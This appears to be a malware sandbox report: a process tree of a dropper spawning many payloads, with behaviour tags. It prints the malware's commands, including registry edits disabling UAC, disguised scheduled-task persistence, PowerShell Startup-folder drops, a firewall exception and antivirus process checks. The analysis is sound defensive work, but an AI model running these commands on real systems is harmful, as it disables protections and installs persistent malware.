PID 3836 wrote to memory of 4340	3836	._cache_New Text Document mod.exe	92
PID 3836 wrote to memory of 4340	3836	._cache_New Text Document mod.exe	92
PID 3836 wrote to memory of 4340	3836	._cache_New Text Document mod.exe	92
PID 4576 wrote to memory of 4080	4576	cmd.exe	93
PID 4576 wrote to memory of 4080	4576	cmd.exe	93
PID 4576 wrote to memory of 4080	4576	cmd.exe	93
PID 4576 wrote to memory of 4140	4576	cmd.exe	115
PID 4576 wrote to memory of 4140	4576	cmd.exe	115
PID 4576 wrote to memory of 4140	4576	cmd.exe	115
PID 4576 wrote to memory of 4640	4576	cmd.exe	95
PID 4576 wrote to memory of 4640	4576	cmd.exe	95
PID 4576 wrote to memory of 4640	4576	cmd.exe	95
PID 4576 wrote to memory of 1212	4576	cmd.exe	96
PID 4576 wrote to memory of 1212	4576	cmd.exe	96
PID 4576 wrote to memory of 1212	4576	cmd.exe	96
PID 4340 wrote to memory of 2508	4340	zoom_invitecode=23884232.zoom.exe	97
PID 4340 wrote to memory of 2508	4340	zoom_invitecode=23884232.zoom.exe	97
PID 4340 wrote to memory of 2508	4340	zoom_invitecode=23884232.zoom.exe	97
PID 3836 wrote to memory of 3100	3836	._cache_New Text Document mod.exe	98
PID 3836 wrote to memory of 3100	3836	._cache_New Text Document mod.exe	98
PID 3836 wrote to memory of 3100	3836	._cache_New Text Document mod.exe	98
PID 4576 wrote to memory of 4428	4576	cmd.exe	100
PID 4576 wrote to memory of 4428	4576	cmd.exe	100
PID 4576 wrote to memory of 4428	4576	cmd.exe	100
PID 4576 wrote to memory of 1556	4576	cmd.exe	101
PID 4576 wrote to memory of 1556	4576	cmd.exe	101
PID 4576 wrote to memory of 1556	4576	cmd.exe	101
PID 3836 wrote to memory of 3744	3836	._cache_New Text Document mod.exe	102
PID 3836 wrote to memory of 3744	3836	._cache_New Text Document mod.exe	102
PID 3836 wrote to memory of 3744	3836	._cache_New Text Document mod.exe	102
PID 3744 wrote to memory of 2524	3744	ApiUpdater.exe	104
PID 3744 wrote to memory of 2524	3744	ApiUpdater.exe	104
PID 3744 wrote to memory of 2524	3744	ApiUpdater.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3300
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:892
- - C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\a\1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3320
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4576
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:860
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4644
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3848
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2492
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 634977
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4080
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Gtk
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4140
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Constitution" Wagon
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4640
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1212
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4428
      - C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com
        
        Surrey.com Q
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1556
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1448
  - - C:\Users\Admin\AppData\Local\Temp\a\test.exe
      "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:948
  - - C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
      "C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4340
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"
        5⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2508
  - - C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
      "C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3100
  - - C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"
      4⤵
      Adds policy Run key to start application
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3744
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2524
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1268
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4292
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1012
        
        C:\ProgramData\Bitdefender\$77-Bitdefender.exe
        
        C:\ProgramData\Bitdefender\$77-Bitdefender.exe
        7⤵
        Adds policy Run key to start application
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:2620
        
        C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5104
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        9⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1676
        
        \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        8⤵
        
        PID:2624
  - - C:\Users\Admin\AppData\Local\Temp\a\windows.exe
      "C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4740
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1408
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:860
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC8C.tmp.bat""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3064
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1568
      - C:\Users\Admin\AppData\Roaming\system.exe
        
        "C:\Users\Admin\AppData\Roaming\system.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\a\T.exe
      "C:\Users\Admin\AppData\Local\Temp\a\T.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4540
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        
        "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force
        5⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        
        PID:4304
  - - C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2116
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        
        "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force
        5⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3896
  - - C:\Users\Admin\AppData\Local\Temp\a\36.exe
      "C:\Users\Admin\AppData\Local\Temp\a\36.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4960
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 392
        5⤵
        Program crash
        
        PID:4148
  - - C:\Users\Admin\AppData\Local\Temp\a\access.exe
      "C:\Users\Admin\AppData\Local\Temp\a\access.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4700
  - - C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe
      "C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"
      4⤵
      PID:3644
    - - C:\Windows\TEMP\{97F4DFCB-E950-48D2-813C-FD6D59C5C400}\.cr\QGFQTHIU.exe
        
        "C:\Windows\TEMP\{97F4DFCB-E950-48D2-813C-FD6D59C5C400}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe" -burn.filehandle.attached=616 -burn.filehandle.self=612
        5⤵
        
        PID:3532
      - C:\Windows\TEMP\{46C548A1-AF54-44B8-9B40-D2ECD1D8DB53}\.ba\msn.exe
        
        C:\Windows\TEMP\{46C548A1-AF54-44B8-9B40-D2ECD1D8DB53}\.ba\msn.exe
        6⤵
        
        PID:3256
        
        C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
        
        C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
        7⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        8⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        9⤵
        
        PID:836
  - - C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"
      4⤵
      PID:2492
    - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        
        PID:5908
      - C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe"
        6⤵
        
        PID:7116
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\020ad751-73cc-45f5-90ee-065439e9c2f3.bat"
        7⤵
        
        PID:6596
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5892
  - - C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"
      4⤵
      PID:1172
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 2024
        5⤵
        Program crash
        
        PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"
      4⤵
      PID:1548
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3440
    - - C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
        5⤵
        
        PID:5584
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5496
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2cga16j5Csql.bat" "
        6⤵
        
        PID:4592
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:6240
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6624
        
        C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"
        7⤵
        
        PID:6288
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5Wnpa61VeNZ2.bat" "
        8⤵
        
        PID:6680
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        9⤵
        
        PID:6304
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6288 -s 2284
        8⤵
        Program crash
        
        PID:1924
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 2016
        6⤵
        Program crash
        
        PID:4992
  - - C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"
      4⤵
      PID:1968
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\a\Servers.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"
      4⤵
      PID:1984
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5344
    - - C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe
        
        "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"
        5⤵
        
        PID:3708
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5836
  - - C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe
      "C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"
      4⤵
      PID:1484
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4120
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        Modifies registry key
        
        PID:3852
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
        5⤵
        
        PID:4592
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"
        6⤵
        
        PID:2312
        
        C:\ProgramData\GoogleDat\GoogleUpdate.exe
        
        C:\ProgramData\GoogleDat\GoogleUpdate.exe
        7⤵
        
        PID:4716
        
        C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        8⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        9⤵
        Modifies registry key
        
        PID:6212
        
        C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        8⤵
        
        PID:5344
  - - C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"
      4⤵
      PID:5716
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3476
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2416
    - - C:\Users\Admin\AppData\Local\Temp\a\Update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3560
    - - C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4808
      - C:\Windows\Temp\{2D44A5E1-CE3F-41E3-B407-C25AAE47781C}\.cr\BQEHIQAG.exe
        
        "C:\Windows\Temp\{2D44A5E1-CE3F-41E3-B407-C25AAE47781C}\.cr\BQEHIQAG.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe" -burn.filehandle.attached=724 -burn.filehandle.self=728
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4816
        
        C:\Windows\Temp\{7E5989CC-6BBF-4997-8689-0DFECE7DF881}\.ba\DBDownloader.exe
        
        C:\Windows\Temp\{7E5989CC-6BBF-4997-8689-0DFECE7DF881}\.ba\DBDownloader.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1820
        
        C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
        
        C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:2988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1268
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        10⤵
        
        PID:5748
    - - C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:4612
      - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4292
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:952
      - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        6⤵
        
        PID:5084
    - - C:\Users\Admin\AppData\Local\Temp\a\99999.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\99999.exe"
        5⤵
        Executes dropped EXE
        
        PID:4628
      - C:\Users\Admin\AppData\Roaming\server.exe
        
        "C:\Users\Admin\AppData\Roaming\server.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Drops autorun.inf file
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:1104
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3096
    - - C:\Users\Admin\AppData\Local\Temp\a\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\22.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1140
    - - C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4792
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4660
      - C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:1916
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5HYSZnqqrUwh.bat" "
        7⤵
        
        PID:4188
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:1072
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3684
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        8⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:5512
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VTc9eTEROb4i.bat" "
        9⤵
        
        PID:5708
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:5820
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3728
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        10⤵
        
        PID:5652
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FX5RiTCtN0ks.bat" "
        11⤵
        
        PID:5808
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:5352
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3776
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        12⤵
        
        PID:5520
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5ImYpK9rwbfi.bat" "
        13⤵
        
        PID:2308
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:464
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2924
        
        C:\Windows\system32\dll32\msinfo32.exe
        
        "C:\Windows\system32\dll32\msinfo32.exe"
        14⤵
        
        PID:5052
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
        15⤵
